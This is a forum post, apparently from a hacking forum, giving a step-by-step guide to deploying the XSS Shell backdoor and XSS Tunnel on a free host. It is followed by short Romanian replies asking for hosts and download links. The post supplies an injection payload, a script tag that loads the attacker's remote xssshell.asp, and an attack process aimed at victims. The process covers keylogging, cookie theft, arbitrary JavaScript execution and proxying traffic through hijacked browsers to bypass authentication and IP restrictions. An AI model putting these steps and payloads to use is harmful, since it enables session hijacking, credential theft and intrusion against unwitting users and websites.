XSS Tunnel

[Guest Kabron]

XSS Shell is a powerful XSS backdoor and XSS zombie manager. This concept was first presented by "XSS-Proxy – http://xss-proxy.sourceforge.net/". Normally during XSS attacks an attacker has one shot, however, an XSS Shell can be used interactively to send requests and receive responses from a victim, it is also possible to backdoor the page and keep the connection open between the attacker and the victim.

It is a good way of bypassing the following protections:

- Bypassing IP Restrictions

- NTLM / Basic Auth or any similar authentication

- Session based custom protections

Key Features:

- Regenerating Pages: this is one of the key and advanced features of XSS Shell. XSS Shell re-renders the infected page and keeps the user in a virtual environment. Thus even when a user clicks on any of the links in the infected page they will be still under control! (within cross-domain restrictions) In normal XSS attacks when the user leaves the page nothing can be done. Secondly this feature keeps the session open so even the victims follow an outside link from the infected page session which is not going to timeout and the attacker will be still in charge.

-Keylogger

-Mouse Logger (click points + current DOM)

Built-in Commands:

- Get Keylogger Data

- Get Current Page (Current rendered DOM / such as a screenshot)

- Get Cookie

- Execute supplied javaScript (eval)

- Get Clipboard (IE only)

- Get internal IP address (Firefox + JVM only)

- Check victim’s visited URL history

- Force to Crash victim’s browser

Install

1. Download Xss Tunnel from http://ferruh.mavituna.com/xss-tunnelling-pap er-and-xss-tunnel-tool-oku/. XSS Shell was written in ASP. As the backend, it uses MS Access for portability and easy installation. It requires IIS 5 or above to work.

7host is a free web host that supports ASP, MS Access, and IIS. For this video my url is http://free.7host05.com/Patchy/

2. Modify xssshell.asp SERVER variable to http://free.7host05.com/Patchy/

3. Modify admin/db.asp DBPATH to "E:user1Patchydbshell.mdb" to configure database. Also, the default password (w00t) can be changed in this file. To figure out the path to the database use this script

<%

Response.Write Server.MapPath(".")

%>

4. Upload content of Xssshell folder.

Attack

Xss Shell works by setting up an Xss Channel which is basically an AJAX application that can obtain commands and send back responses. To enable the XSS Shell an attacker needs to inject the XSS Shell’s JavaScript reference by way of an XSS attack. The attacker is then able to control the victim’s browser. After this point the attacker can see requests, responses and is able to instruct the victim’s browser to carryout requests.

The Xss Shell has three main parts. First, the server side part of the XSS Shell coordinates the XSS Shell between an attacker and the victim. The second part of the tool is client-side and written in JavaScript. This loads in the victim’s browser and is responsible for the receiving and processing of commands together with providing the channel between the victim and the attacker. The final part of the XSS Shell is the administration interface. An attacker can send new commands and receive the responses from a victim(s) browser instantly from this interface.

1. An attacker infects a website with a persistent or reflected (temporary) XSS attack which calls remote XSS Shell JavaScript. Ex. <script src="http://free.7host05.com/Patchy/xssshell.asp "></script>

2. The Victim follows a link or visits the page and executes the JavaScript within that domain.

3. The Victim’s browser begins to perform periodic requests to the XSS Shell Server and looks for new commands.

4. When the victim browser receives a new command such as (Get Cookies,

Execute custom JavaScript, Get Key logger Data etc.) it is processed and returns the results to the XSS Shell.

5. The Attacker can push new commands to victim(s) browser and view the results from the XSS Shell administration interface.

Xss Tunnel

XSS Tunneling is the tunneling of HTTP traffic through an XSS Channel to use virtually any application that supports HTTP proxies. The XSS Tunnel is the standard HTTP proxy which sits on an attacker’s system. Any tool that is configured to use it will tunnel its traffic through the active XSS Channel on the XSS Shell server. The XSS Tunnel converts the request and responds transparently to validate the HTTP responses and XSS Shell requests.

How Does XSS Tunnel Work?

1. The XSS Tunnel connects to a specified XSS Shell and obtains the current active identifier (the victim to be controlled)

2. The local HTTP client (browser, Nikto etc.) sends HTTP requests to the XSS Tunnel. The XSS Tunnel converts the HTTP requests into requests which the XSS Shell can understand and process. It then sends these requests to the XSS Shell Server.

3. The XSS Shell Client (which resides in JavaScript in the victim’s browser) performs periodic requests for the XSS Shell Server and checks for new commands to process.

4. XSS Tunnel in the local cache, checks the XSS Shell Server for a response for previously assigned requests. If there is a response it converts the response to a valid HTTP response and sends it to the client application. By default the XSS Tunnel caches JavaScript, CSS and image files for a better performance. This is really required if using the XSS Tunnel with a browser. If requested the resource is already in the cached XSS Tunnel and can be obtained from the local cache and sent to the client application. Caching can be disabled or the cache can be managed from the user interface of XSS Tunnel.

Attack Process

1. Setup the XSS Shell Server,

2. Configure the XSS Tunnel to use the XSS Shell Server,

3. Prepare the XSS attack (submit to a vulnerable website or send a link etc.),

4. Launch the XSS Tunnel and wait for a victim,

5. Configure the tool or browser to use the XSS Tunnel,

6. When you see victim in the XSS Tunnel, start to use your browser / tool for the targeted domain.

Image To prove

Videos tut HD :

http://www.youtube.com/watch?v=Vg7lhWuPjMY
http://www.youtube.com/watch?v=Cevlym76CWI&feature=related
http://www.youtube.com/watch?v=OkiMTqYD1_Q&feature=related

[ioinel]

bun. un free host pe care sa pot sa-l pun stii?

later:scuze, abia acum am vazut de 7host

[ViruSir]

Un alt link de download ?

[snoopeu]

download?